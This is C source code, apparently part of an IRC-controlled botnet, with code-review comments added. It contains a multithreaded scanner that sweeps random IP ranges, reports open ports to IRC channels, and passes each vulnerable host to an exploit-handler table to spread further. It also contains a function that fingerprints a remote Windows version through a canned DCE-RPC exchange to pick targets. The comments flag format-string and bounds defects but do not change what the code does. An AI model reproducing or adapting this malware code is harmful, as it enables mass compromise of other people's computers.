/*
 * AdvPortScanner - worker thread body for one sub-thread of an "advanced" scan.
 *
 * param  : pointer to an ADVSCAN describing the job (target/port/delay, IRC
 *          socket and channels, exploit index, thread bookkeeping). The struct
 *          is copied by value on entry; the only write back through the
 *          pointer is cgotinfo = TRUE, which signals the creator that the
 *          parameter block has been consumed.
 *
 * Loop   : runs while advinfo[parent].info is non-zero (the parent scan thread
 *          clears it to stop all sub-threads). Each iteration pulls the next
 *          target address, probes scan.port, and either reports an open port
 *          (scan.exploit == -1) or hands the target to the exploit table entry.
 *
 * Return : never returns through the DWORD result; the thread ends with
 *          ExitThread(0) after clearthread(threadnum).
 *
 * Review notes (defects visible in this function):
 *  - Four sprintf calls pass a non-literal string as the FORMAT argument
 *    (threads[].name, exinfo.ip, exinfo.command, exinfo.chan). Any '%' in the
 *    source text is interpreted as a conversion, and none of the copies is
 *    bounded by the destination size.
 *  - exploit[scan.exploit] is indexed without a range check here; presumably
 *    the command parser validates the index before starting the scan — verify.
 *  - srand(GetTickCount()) is a low-entropy per-thread seed; sub-threads
 *    started close together will draw near-identical sequences.
 */
DWORD WINAPI AdvPortScanner(LPVOID param)
{
    IN_ADDR in;
    char logbuf[LOGLINE];
    /* Private copy of the job; the caller's block may be reused once cgotinfo is set. */
    ADVSCAN scan = *((ADVSCAN *)param);
    ADVSCAN *scanp = (ADVSCAN *)param;
    scanp->cgotinfo = TRUE;
    int threadnum=scan.cthreadnum;   /* slot in the global threads[] table */
    int threadid=scan.cthreadid;     /* ordinal of this sub-thread, for log lines only */
    /* Seeds the CRT RNG used by the random address generator; tick count is predictable. */
    srand(GetTickCount());
    /* Parent scan thread owns the stop flag; every sub-thread polls it once per probe. */
    while (advinfo[threads[threadnum].parent].info) {
        DWORD dwIP;
        /* scan.ip is only consulted in random mode — presumably a base/mask for the range; confirm in AdvGetNextIPRandom. */
        if (scan.random)
            dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
        else
            dwIP = AdvGetNextIP(threads[threadnum].parent);
        in.s_addr = dwIP;
        sprintf(logbuf,"IP: %s:%d, Scan thread: %d, Sub-thread: %d.", finet_ntoa(in), scan.port, threads[threadnum].parent, threadid);
        /* DEFECT: logbuf is the format string, not an argument, and the copy is unbounded.
         * Also written outside the critical section that guards the reporting below. */
        sprintf(threads[threadnum].name, logbuf);
        /* AdvPortOpen: TCP connect probe with scan.delay as the timeout (semantics in its own definition). */
        if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
            if (scan.exploit == -1) {
                /* Report-only mode: serialise IRC output and log append across sub-threads. */
                EnterCriticalSection(&CriticalSection);
                sprintf(logbuf,"IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
                if (!scan.silent) {
                    /* msgchan, when set, overrides the channel the scan was started from. */
                    if (scan.msgchan[0] != '\0')
                        irc_privmsg(scan.sock,scan.msgchan,logbuf,scan.notice, TRUE);
                    else
                        irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
                }
                addlog(logbuf);   /* logged even when silent — this fixed message is a stable log artefact */
                LeaveCriticalSection(&CriticalSection);
            } else {
                /* Exploit mode: build a by-value EXINFO and dispatch to the table entry's handler. */
                EXINFO exinfo;
                /* DEFECT (x3 below): non-literal format strings and no length bound on the EXINFO fields. */
                sprintf(exinfo.ip, finet_ntoa(in));
                sprintf(exinfo.command, exploit[scan.exploit].command);
                if (scan.msgchan[0] != '\0')
                    sprintf(exinfo.chan, scan.msgchan);
                else
                    sprintf(exinfo.chan, scan.chan);
                exinfo.sock = scan.sock;
                exinfo.notice = scan.notice;
                exinfo.silent = scan.silent;
                exinfo.port = scan.port;
                exinfo.threadnum = threadnum;
                exinfo.exploit = scan.exploit;
                /* No bounds check on scan.exploit at this point. Handler runs synchronously on this thread. */
                exploit[scan.exploit].exfunc(exinfo);
            }
        }
        /* Fixed 2 s pause between probes per sub-thread; not adjustable from the ADVSCAN block. */
        Sleep(2000);
    }
    /* Release the threads[] slot before the OS tears the thread down. */
    clearthread(threadnum);
    ExitThread(0);
}
/*
 * FpHost - guess the Windows generation of szHost using the probe selected
 * by iFpType.
 *
 * szHost  : target host, passed to ResolveAddress() (FP_RPC) or finet_addr()
 *           (FP_PORT5K); resolution failures are not checked here.
 * iFpType : FP_RPC    - connect to TCP/135, send the canned DCE-RPC bind in
 *                       rpcfp_bindstr, expect a bind-ack, send rpcfp_inqifids,
 *                       then classify the response by interface-UUID signature
 *                       (w2kuuid_sig / wxpuuid_sig) and by reply length.
 *           FP_PORT5K - an open TCP/5000 (3 s timeout) is taken as OS_WINXP.
 *           FP_TTL    - not implemented; always OS_UNKNOWN.
 *
 * Returns : one of OS_WINNT, OS_WIN2K, OS_WINXP, OS_UNKNOWN.
 *
 * Review notes:
 *  - frecv() is only checked against SOCKET_ERROR. A return of 0 (peer closed)
 *    or 1–2 bytes leaves szRecvBuf[2] unset / stale from the previous recv,
 *    so the packet-type compare reads indeterminate data.
 *  - sizeof(x)-1 for the request buffers is only correct if rpcfp_bindstr,
 *    rpcfp_inqifids and the *_sig objects are char arrays (NUL-terminated
 *    literals), not pointers — confirm their definitions.
 *  - The socket is closed on every path after a successful fsocket(); the
 *    early-return for a failed fsocket() has nothing to release.
 */
int FpHost(const char *szHost, int iFpType)
{
    switch(iFpType) {
    case FP_RPC: {
        char szRecvBuf[8192];
        int iRetVal=OS_UNKNOWN;
        int sSocket=fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sSocket==SOCKET_ERROR || sSocket==INVALID_SOCKET)
            return OS_UNKNOWN;
        SOCKADDR_IN ssin;
        memset(&ssin, 0, sizeof(ssin));
        ssin.sin_family=AF_INET;
        ssin.sin_port=fhtons(135);   /* MSRPC endpoint mapper port */
        /* No check that resolution succeeded; an unresolvable name still gets a connect attempt. */
        ssin.sin_addr.s_addr=ResolveAddress((char *)szHost);
        int iErr=fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin));
        if(iErr!=SOCKET_ERROR) {
            /* Step 1: canned bind request. */
            iErr=fsend(sSocket, rpcfp_bindstr, sizeof(rpcfp_bindstr)-1, 0);
            if(iErr==SOCKET_ERROR) { fclosesocket(sSocket); return iRetVal; }
            /* DEFECT: a short or zero-length recv is not rejected before szRecvBuf[2] is read below. */
            iErr=frecv(sSocket, szRecvBuf, sizeof(szRecvBuf), 0);
            if(iErr==SOCKET_ERROR) { fclosesocket(sSocket); return iRetVal; }
            /* Byte 2 of the reply is compared against the DCE packet-type constants. */
            if(szRecvBuf[2]==DCE_PKT_BINDACK) {
                /* Step 2: interface-ID query on the bound connection. */
                iErr=fsend(sSocket, rpcfp_inqifids, sizeof(rpcfp_inqifids)-1,0);
                if(iErr==SOCKET_ERROR) { fclosesocket(sSocket); return iRetVal; }
                /* Same short-read issue as above; iErr (bytes received) becomes the search length. */
                iErr=frecv(sSocket, szRecvBuf, sizeof(szRecvBuf),0);
                if(iErr==SOCKET_ERROR) { fclosesocket(sSocket); return iRetVal; }
                if(szRecvBuf[2]==DCE_PKT_RESPONSE) {
                    /* Signature match on the received bytes only (length iErr). */
                    if(MemContains(szRecvBuf, iErr, w2kuuid_sig, sizeof(w2kuuid_sig)-1)) {
                        /* Reply-length heuristic: under 300 bytes is classed as NT, otherwise 2000. */
                        if(iErr<300) iRetVal=OS_WINNT;
                        else iRetVal=OS_WIN2K;
                    } else if(MemContains(szRecvBuf, iErr, wxpuuid_sig, sizeof(wxpuuid_sig)-1))
                        iRetVal=OS_WINXP;
                    else
                        iRetVal=OS_UNKNOWN;
                } else { fclosesocket(sSocket); return iRetVal; }
            } else { fclosesocket(sSocket); return iRetVal; }
        } else { fclosesocket(sSocket); return iRetVal; }
        fclosesocket(sSocket);
        return iRetVal;
    }
    break;   /* unreachable: the FP_RPC block returns on every path */
    case FP_PORT5K:
        /* Open TCP/5000 is treated as sufficient evidence of XP; closed falls through to OS_UNKNOWN. */
        if(AdvPortOpen(finet_addr(szHost), 5000, 3))
            return OS_WINXP;
        break;
    case FP_TTL:
        /* Placeholder; no TTL probe is implemented. */
        return OS_UNKNOWN;
        break;   /* unreachable */
    default:
        return OS_UNKNOWN;
        break;   /* unreachable */
    }
    return OS_UNKNOWN;
}